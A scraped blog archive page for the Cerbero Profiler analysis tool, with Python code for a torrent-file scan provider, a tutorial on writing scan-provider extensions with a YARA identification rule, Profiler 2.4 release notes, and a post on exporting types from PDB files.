# Written by Petru Paler

def decode_int(x, f):
    f += 1
    newf = x.index(0x65, f)
    n = int(x[f:newf])
    if x[f] == 0x2D: # -
        if x[f + 1] == 0x30:
            raise ValueError
    elif x[f] == 0x30 and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(0x3A, f) # :
    n = int(x[f:colon])
    if x[f] == 0x30 and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 0x65: # e
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 0x65: # e
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        return {}
    if l != len(x):
        return {}
    return r

#
# END OF 3RD PARTY CODE
#

class TorrentObject(CFFObject):

    def __init__(self):
        super(TorrentObject, self).__init__()
        self.SetObjectFormatName("TORRENT")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)
        self.tdict = None

    def GetDictionary(self):
        if self.tdict is None:
            size = min(self.GetSize(), MAX_TORRENT_SIZE)
            data = self.Read(0, size)
            self.tdict = bdecode(bytes(data))
        return self.tdict

    def CreationDate(self):
        d = self.GetDictionary()
        cd = d.get(b"creation date", None)
        if cd is None or not type(cd) is int:
            return NTDateTime()
        return NTDateTime.fromMSecsSinceEpoch(cd * 1000)

    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
            al = d[b"announce-list"]
            # check every type before using the value (unhashable items can't be looked up in a set)
            if type(al) is list:
                for a in al:
                    if type(a) is list and len(a) > 0 and type(a[0]) is bytes and a[0] not in dup:
                        trackers.append(a[0])
                        dup.add(a[0])
        return trackers

    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d:
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        # only the first path component is shown
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0

def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    def __init__(self):
        super(TorrentScanProvider, self).__init__()
        self.obj = None
        self.meta_keys = [b"created by", b"creation date", b"comment"]
        # format item IDs
        self.FormatItem_Dictionary = 1
        self.FormatItem_Trackers = 2
        self.FormatItem_Files = 3
        # format item names
        self.fi_names = ["Dictionary", "Trackers", "Files"]

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TorrentObject()
        self.obj.Load(self.getStream())
        d = self.obj.GetDictionary()
        return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR

    def _startScan(self):
        d = self.obj.GetDictionary()
        if any(mk in d for mk in self.meta_keys):
            e = ScanEntryData()
            e.category = SEC_Privacy
            e.type = CT_MetaData
            self.addEntry(e)
        if self.obj.GetSize() > MAX_TORRENT_SIZE:
            e = ScanEntryData()
            e.category = SEC_Warn
            e.type = CT_UnaccountedSpace
            self.addEntry(e)
        return self.SCAN_RESULT_FINISHED

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_MetaData:
            d = self.obj.GetDictionary()
            out = proTextStream()
            for mk in self.meta_keys:
                if mk in d:
                    tmk = mk.decode("utf-8", errors="ignore")
                    if tmk == "creation date":
                        dt = self.obj.CreationDate()
                        tmv = dt.toString() if dt.isValid() else "?"
                    else:
                        # the value comes from an untrusted file: decode it only if it is bytes
                        v = d[mk]
                        tmv = v.decode("utf-8", errors="ignore") if type(v) is bytes else "?"
                    out._print(tmk)
                    out._print(": ")
                    out._print(tmv)
                    out.nl()
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData(out.buffer)
            return True
        elif sdata.type == CT_UnaccountedSpace:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,))
            return True
        return False

    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, self.FormatItem_Dictionary)
        ft.appendChild(fi, self.FormatItem_Trackers)
        ft.appendChild(fi, self.FormatItem_Files)
        return ft

    def _formatViewInfo(self, finfo):
        if finfo.fid >= 1 and finfo.fid - 1 < len(self.fi_names):
            finfo.text = self.fi_names[finfo.fid - 1]
            return True
        return False

    def _formatViewData(self, sdata):
        if sdata.fid == self.FormatItem_Dictionary:
            sdata.setViews(SCANVIEW_TEXT)
            txt = pprint.pformat(self.obj.GetDictionary())
            sdata.data.setData(txt)
            return True
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(filesViewCb, self.obj.GetFiles())
            return True
        return False

def torrentAllocator():
    return TorrentScanProvider()

We could still extract more information from the torrent file. For instance, we could show the list of hashes and which portion of which file each of them belongs to. If that's interesting for forensic purposes, we can easily add this view in the future.

<footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/torrent-support/" rel="bookmark"><time class="entry-date published" datetime="2015-09-23T16:50:31+00:00">September 23, 2015</time><time class="updated" datetime="2021-04-01T16:32:00+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/forensics/" rel="category tag">Forensics</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/p2p/" rel="tag">P2P</a>, <a href="https://blog.cerbero.io/tag/torrent/" rel="tag">Torrent</a>, <a href="https://blog.cerbero.io/tag/trackers/" rel="tag">Trackers</a></span><span class="comments-link"><a href="https://blog.cerbero.io/torrent-support/#respond">Leave a comment<span class="screen-reader-text"> on Torrent Support</span></a></span> </footer><article id="post-1551" class="post-1551 post type-post status-publish format-standard hentry category-suite-standard">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark">Scan Providers</a></h2> </header>
<div class="entry-content"> <p>Version 2.5.0 is close to being released and comes with the last type of extension exposed to Python: scan providers. Scan provider extensions are not only the most complex type of extension, but also the most powerful, as they make it possible to add support for new file formats entirely from Python! </p> <p>This feature required exposing a lot more of the SDK to Python and can’t be completely discussed in one post. This post is going to introduce the topic, while future posts will show real-life examples.</p> <p>Let’s start from the list of Python scan providers under Extensions -> Scan providers:</p> <p><a href="/wp-content/uploads/2015/09/scanp/extlist.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/extlist.png" alt="Scan provider extensions"></a></p> <p>This list is retrieved from the configuration file ‘scanp.cfg’. Here’s an example entry:</p> <pre lang="ini">[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator</pre> <p>The name of the section has two purposes: it specifies the name of the format being supported (in this case ‘TEST’) and also the name of the extension which is automatically associated with that format (in this case ‘.test’, case insensitive). The hard limit for format names is 9 characters for now; this may change in the future if more are needed. The <strong>label</strong> is the description. The <strong>ext</strong> parameter is optional and specifies additional extensions to be associated with the format. <strong>group</strong> specifies the type of file which is being supported; available groups are: img, video, audio, doc, font, exe, manexe, arch, db, sys, cert, script. <strong>file</strong> specifies the Python source file and <strong>allocator</strong> the function which returns a new instance of the scan provider class.</p> <p>Let’s start with the allocator:</p> <pre lang="python">def allocator():
    return TestScanProvider()</pre> <p>It just returns a new instance of <strong>TestScanProvider</strong>, which is a class derived from <strong>ScanProvider</strong>:</p> <pre lang="python">class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None</pre> <p>Every scan provider has some mandatory methods it must override. Let’s begin with the first ones:</p> <pre lang="python">    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK</pre> <p><strong>_clear</strong> gives a chance to free internal resources when they’re no longer used. In Python this is not usually important as member objects will automatically be freed when their reference count reaches zero.</p> <p><strong>_getObject</strong> must return the internal instance of the object being parsed. This must return an instance of a <strong>CFFObject</strong> derived class.</p> <p><strong>_initObject</strong> creates the object instance and loads the data stream into it. In the sample above we assume that loading succeeds. Otherwise, we would have to return <strong>SCAN_RESULT_ERROR</strong>. This method is not called by the main thread, so that it doesn’t block the UI during long parse operations.</p> <p>Let’s take a look at the <strong>TestObject</strong> class:</p> <pre lang="python">class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)</pre> <p>This is a minimalistic implementation of a <strong>CFFObject</strong> derived class. Usually it should contain at least an override of the <strong>CustomLoad</strong> method, which gives the opportunity to fail when the data stream is first loaded through the <strong>Load</strong> method. <strong>SetDefaultEndianness</strong> wouldn’t even be necessary, as every object is little endian by default. <strong>SetObjectFormatName</strong>, on the other hand, is very important, as it sets the internal format name of the object.</p> <p>Let’s now take a look at how we scan a file:</p> <pre lang="python">    def _startScan(self):
        return self.SCAN_RESULT_OK

    def _threadScan(self):
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)</pre> <p>The code above will issue a single warning concerning native code. When <strong>_startScan</strong> returns <strong>SCAN_RESULT_OK</strong>, <strong>_threadScan</strong> will be called from a thread other than the main UI one. The logic behind this is that <strong>_startScan</strong> is actually called from the main thread and if the scan of the file doesn’t require complex operations, like in the case above, then the method could return <strong>SCAN_RESULT_FINISHED</strong> and then <strong>_threadScan</strong> won’t be called at all. During a threaded scan, an abort by the user can be detected via the <strong>isAborted</strong> method.</p> <p>From the UI point of view, when a scan entry is clicked in the summary, the scan provider is supposed to return UI information. </p> <pre lang="python">    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False</pre> <p>This will display a text field with a predefined content when the user clicks the scan entry in the summary. This is fairly easy, but what happens when we have several entries of the same type and need to differentiate between them? That’s where the <strong>data</strong> member of <strong>ScanEntryData</strong> plays a role: it is a string which will be included in the report XML and passed back to <strong>_scanViewData</strong> as an XML node.</p> <p>For instance:</p> <pre lang="python">e.data = "<o>1234</o>"</pre> <p>Becomes this in the final XML report:</p> <pre lang="xml"><d>
    <o>1234</o>
</d></pre> <p>The <strong>dnode</strong> argument of <strong>_scanViewData</strong> points to the ‘d’ node and its first child will be the ‘o’ node we passed. The <strong>xml</strong> argument represents an instance of the <strong>NTXml</strong> class, which can be used to retrieve the children of the <strong>dnode</strong>.</p> <p>But this is only half of the story: some of the scan entries may represent embedded files (category <strong>SEC_File</strong>), in which case the <strong>_scanViewData</strong> method must return the data representing the file.</p> <p>Apart from scan entries, we may also want the user to explore the format of the file. To do that we must return a tree representing the structure of our file:</p> <pre lang="python">    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft</pre> <p>The <strong>enableIDs</strong> method must be called right after creating a new <strong>FormatTree</strong> instance. The code above creates a format item with id 1 with a child item with id 2, which results in the following:</p> <p><a href="/wp-content/uploads/2015/09/scanp/format.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/format.png" alt="Format tree"></a></p> <p>But of course, we have specified neither labels nor different icons in the function above. This information is retrieved for each item when required through the following method:</p> <pre lang="python">    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False</pre> <p>The various items are identified by their id, which was specified during the creation of the tree.</p> <p>The UI data for each item is retrieved through the <strong>_formatViewData</strong> method:</p> <pre lang="python">    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hsplitter csizes='40-*'><table id='1'/><hex id='2'/></hsplitter></ui>")
            sdata.setCallback(cb, None)
            return True
        return False</pre></div></article> <p>This will display a custom view with a table and a hex view separated by a splitter:</p> <p><a href="/wp-content/uploads/2015/09/scanp/cview.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/cview.png" alt="Custom view"></a></p> <p>Of course, we have also specified the callback for our custom view:</p> <pre lang="python">def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0</pre> <p>It is good to remember that format item IDs and IDs used in custom views are used to encode bookmark jumps. So if they change, saved bookmark jumps become invalid.</p> <p>And here again the whole code for a better overview:</p> <pre lang="python">from Pro.Core import *
from Pro.UI import pvnInit, PubIcon_Dir

class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)

def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0

class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK

    def _startScan(self):
        return self.SCAN_RESULT_OK

    def _threadScan(self):
        print("thread msg")
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False

    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft

    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False

    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hsplitter csizes='40-*'><table id='1'/><hex id='2'/></hsplitter></ui>")
            sdata.setCallback(cb, None)
            return True
        return False

def allocator():
    return TestScanProvider()</pre> <p>As you may have noticed in the screen-shot above, the analysed file is called ‘a.t’ and as such isn’t automatically associated with our ‘test’ format. So how does it get associated anyway?</p> <p>Clearly Profiler doesn’t rely on extensions alone to identify the format of a file. For external scan providers a signature mechanism based on YARA has been introduced. In the <strong>config</strong> directory of the user, you can create a file named ‘yara.plain’ and insert your identification rules in it, e.g.:</p> <pre lang="text">rule test
{
    strings:
        $sig = "test"
    condition:
        $sig at 0
}</pre> <p>This rule will identify the format as ‘test’ if the first 4 bytes of the file match the string ‘test’: the name of the rule identifies the format.</p> <p>The file ‘yara.plain’ will be compiled to the binary ‘yara.rules’ file at the first run. In order to refresh ‘yara.rules’, you must delete it.</p> <p>One important thing to remember is that a rule isn’t matched against an entire file, but only against the first 512 bytes.</p> <p>Of course, our provider behaves 100% like all other providers and can be used to load embedded files:</p> <p><a href="/wp-content/uploads/2015/09/scanp/embfiles.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/09/scanp/embfiles.png" alt="Embedded files"></a></p> <p>Our new provider is used automatically when an embedded file is identified as matching our format.</p><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/scan-providers/" rel="bookmark"><time class="entry-date published" datetime="2015-09-21T22:13:50+00:00">September 21, 2015</time><time class="updated" datetime="2021-04-01T16:32:53+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="comments-link"><a href="https://blog.cerbero.io/scan-providers/#respond">Leave a comment<span class="screen-reader-text"> on Scan Providers</span></a></span> </footer>
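<p>To make the identification rule from the Scan Providers post above more concrete, here is a minimal pure-Python sketch of what the ‘test’ rule checks. It uses neither YARA nor the Profiler SDK: the function name <code>identify_format</code> and the <code>SIGNATURES</code> table are hypothetical, and the only facts taken from the post are that the signature must sit at offset 0 and that only the first 512 bytes are considered.</p>

```python
# Hypothetical illustration only: it mimics the effect of the 'test' rule,
# it is not how Profiler or YARA are implemented.
SCAN_WINDOW = 512  # per the post, only the first 512 bytes are matched

# rule name (which is also the format name) -> signature expected at offset 0
SIGNATURES = {"test": b"test"}

def identify_format(data, signatures=SIGNATURES):
    """Return the name of the first rule whose signature is at offset 0."""
    window = data[:SCAN_WINDOW]
    for name, sig in signatures.items():
        if window.startswith(sig):
            return name
    return None

print(identify_format(b"test payload"))    # test
print(identify_format(b"a test payload"))  # None
```

<p>The second call returns nothing because the signature is present but not at offset 0, which is what the <code>$sig at 0</code> condition expresses.</p>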
<article id="post-1539" class="post-1539 post type-post status-publish format-standard hentry category-suite-standard tag-command-line tag-news">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark">Profiler 2.4</a></h2> </header>
<div class="entry-content"> <p>Profiler 2.4 is out with the following news:</p> <p>– <a href="/?p=1530">added initial support for PDB files (including export of types)</a><br> – <a href="#wscript">added support for Windows Encoded Scripts (VBE, JSE)</a><br> – introduced fixed xml structures<br> – <a href="#sdec">added automatic string decoding in struct tables</a><br> – <a href="#pyline">added Python string command line execution</a><br> – remember the last selected logic group<br> – fixed missing support for wchar_t in C types<br> – updated Qt to 5.4.1<br> – various bug fixes</p> <p>While the most important newly introduced feature is the support for PDB files, here are some other interesting new features:</p> <p><a name="wscript"></a></p> <h2>Support for Windows Encoded Scripts (VBE, JSE)</h2> <p>Windows encoded scripts like VBE and JSE files (the encoded variants of VBS and JS script files) are now supported and automatically decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/wscript.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/wscript.png"></a></p> <p>In the screenshot you can see the decoded output of an encoded file (shown at the bottom).</p> <p><a name="sdec"></a></p> <h2>Automatic string decoding in struct tables</h2> <p>A very basic feature: byte arrays in structures are automatically checked for strings and, when one is found, decoded.</p> <p><a href="/wp-content/uploads/2015/06/24/sdec.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/24/sdec.png"></a></p> <p>(notice the section name automatically displayed as an ASCII string)</p> <p><a name="pyline"></a></p> <h2>Python string command line execution</h2> <p>Apart from <a href="/?p=1464">executing script files passed as command line arguments</a>, it is now also possible to execute Python statements passed directly as an argument.
</p> <p>For instance:</p> <pre lang="text">cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"</pre> <p>The optional ‘-c’ argument tells Profiler not to display the UI.</p> <p>Enjoy!</p></div><footer class="entry-footer">
<span class="byline"><img alt="" src="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=49&d=mm&r=g" srcset="https://secure.gravatar.com/avatar/7a86aa69922858b8d41989621fc1ea364aae1e027546f88a54d94ab1ec2187fc?s=98&d=mm&r=g 2x" class="avatar avatar-49 photo" height="49" width="49" loading="lazy" decoding="async"><span class="screen-reader-text">Author </span><span class="author vcard"><a class="url fn n" href="https://blog.cerbero.io/author/cerbero/">Erik Pistelli</a></span></span><span class="posted-on"><span class="screen-reader-text">Posted on </span><a href="https://blog.cerbero.io/profiler-2-4/" rel="bookmark"><time class="entry-date published" datetime="2015-06-06T16:43:45+00:00">June 6, 2015</time><time class="updated" datetime="2021-04-01T16:33:35+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/command-line/" rel="tag">Command-line</a>, <a href="https://blog.cerbero.io/tag/news/" rel="tag">News</a></span><span class="comments-link"><a href="https://blog.cerbero.io/profiler-2-4/#respond">Leave a comment<span class="screen-reader-text"> on Profiler 2.4</span></a></span> </footer>
</article>
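<p>The command line from the Profiler 2.4 post above needs escaped quotes when typed in a shell. As a small sketch, the same statement can be launched from Python by passing the arguments as a list, so that no shell escaping is involved. The helper name <code>build_cerpro_command</code> is hypothetical and the example assumes that <code>cerpro</code> is on the PATH; only the ‘-c’ and ‘-e’ options come from the post.</p>

```python
import subprocess

def build_cerpro_command(statement, show_ui=False):
    """Build the argument list for 'cerpro -e'; '-c' hides the UI."""
    args = ["cerpro"]
    if not show_ui:
        args.append("-c")
    args += ["-e", statement]
    return args

statement = 'from Pro.Core import *;proCoreContext().msgBox(0, "Hello world!")'
command = build_cerpro_command(statement)
print(command)

# Uncomment to actually launch Profiler (assumes 'cerpro' is on the PATH):
# subprocess.run(command, check=True)
```

<p>Since the statement is a single list element, the inner double quotes can be written as they are.</p>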
<article id="post-1530" class="post-1530 post type-post status-publish format-standard hentry category-suite-standard tag-headers tag-pdb tag-python tag-sdk">
<header class="entry-header">
<h2 class="entry-title"><a href="https://blog.cerbero.io/pdb-support-including-export-of-types/" rel="bookmark">PDB support (including export of types)</a></h2> </header>
<div class="entry-content"> <p>The main feature of the upcoming 2.4 version of Profiler is the initial support for the PDB format. Our code doesn’t rely on the Microsoft DIA SDK and thus also works on OS X and Linux.</p> <p>Since the PDB format is undocumented, this task would’ve been extremely difficult without the <a href="http://undocumented.rawol.com/">fantastic work on PDBs</a> by Sven B. Schreiber, who can never be praised enough.</p> <p>Let’s open a PDB file.</p> <p><a href="/wp-content/uploads/2015/06/pdb/streams.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/streams.png"></a></p> <p>As you can see, the streams in the PDB can be explored. The TPI stream (the one describing types) offers further inspection.</p> <p><a href="/wp-content/uploads/2015/06/pdb/tpi.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/tpi.png"></a></p> <p>All the types contained in the PDB can be exported to a Profiler header by pressing Ctrl+R and executing the ‘Dump types to header’ action.</p> <p><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/action.png"></p> <p>Now the types can be used from both the hex editor and the Python SDK. </p> <p><a href="/wp-content/uploads/2015/06/pdb/hexed.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hexed.png"></a></p> <p>We can explore the dumped header by using, as usual, the Header Manager tool.</p> <p><a href="/wp-content/uploads/2015/06/pdb/hdrmgr.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/hdrmgr.png"></a></p> <p>The type shown above in the hex editor is simple. So let’s see what a more complex PDB type may look like.</p> <pre lang="xml"><r id="CWnd" type="class" size="84">
  <b>
    <b type="CCmdTarget" offset="0" access="public"/>
  </b>
  <m id="_GetBaseClass" type="CRuntimeClass * ()"/>
  <s id="classCWnd" type="CRuntimeClass const"/>
  <m id="GetThisClass" type="CRuntimeClass * ()"/>
  <m id="GetRuntimeClass" type="CRuntimeClass * ()"/>
  <m id="CreateObject" type="CObject * ()"/>
  <m id="GetCurrentMessage" type="tagMSG const * ()"/>
  <f id="m_hWnd" type="HWND__ *" offset="32"/>
  <m id="operator struct HWND__ *" type="HWND__ * ()"/>
  <m id="operator==" type="int32 (CWnd const *)"/>
  <m id="operator!=" type="int32 (CWnd const *)"/>
  <m id="GetSafeHwnd" type="HWND__ * ()"/>
  <m id="GetStyle" type="unsigned int ()"/>
  <m id="GetExStyle" type="unsigned int ()"/>
  <m id="ModifyStyle" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"/>
  <m id="ModifyStyle" type="int32 (unsigned int, unsigned int, uint32)"/>
  <m id="ModifyStyleEx" type="int32 (HWND__ *, unsigned int, unsigned int, uint32)"/>
  <m id="ModifyStyleEx" type="int32 (unsigned int, unsigned int, uint32)"/>
  <m id="GetOwner" type="CWnd * ()"/>
  <m id="SetOwner" type="void (CWnd *)"/>
  <m id="GetWindowInfo" type="int32 (tagWINDOWINFO *)"/>
  <m id="GetTitleBarInfo" type="int32 (tagTITLEBARINFO *)"/>
  <m id="CWnd" type="void (CWnd const *)"/>
  <m id="CWnd" type="void (HWND__ *)"/>
  <m id="CWnd" type="void ()"/>
  <m id="FromHandle" type="CWnd * (HWND__ *)"/>
  <m id="FromHandlePermanent" type="CWnd * (HWND__ *)"/>
  <m id="DeleteTempMap" type="void ()"/>
  <!-- etc. -->
</r></pre> <p>The PDB code is also exposed to the SDK. This is a small snippet of code, which dumps all the types to a text buffer and then displays them in a text view.</p> <pre lang="python">from Pro.Core import *
from Pro.UI import *
from Pro.PDB import *

def showPDBTypes():
    ctx = proContext()
    # text stream which receives the dumped types
    out = proTextStream()
    out.setIndentSize(4)
    # the PDB object of the file currently open in the workspace
    obj = ctx.currentScanProvider().getObject()
    tpi = obj.GetStreamObject(PDB_STREAM_ID_TPI)
    tpihdr = obj.TPIHeader(tpi)
    tiMin = tpihdr.Num("tiMin")
    tiMax = tpihdr.Num("tiMax")
    tctx = obj.CreateTypeContext(tpi)
    # dump every type index from tiMin up to, but not including, tiMax
    for ti in range(tiMin, tiMax):
        tctx.DumpType(out, ti)
    # show the result in a text view with XML highlighting
    view = ctx.createView(ProView.Type_Text, "PDB Test")
    view.setLanguage("XML")
    view.setText(out.buffer)
    ctx.addView(view)

showPDBTypes()</pre> <p><a href="/wp-content/uploads/2015/06/pdb/pyresult.png"><img decoding="async" class="post-img" src="/wp-content/uploads/2015/06/pdb/pyresult.png"></a></p> <p>In order to dump all types to a single header, you can use the <strong>DumpAllToHeader</strong> method.</p></div><footer class="entry-footer">
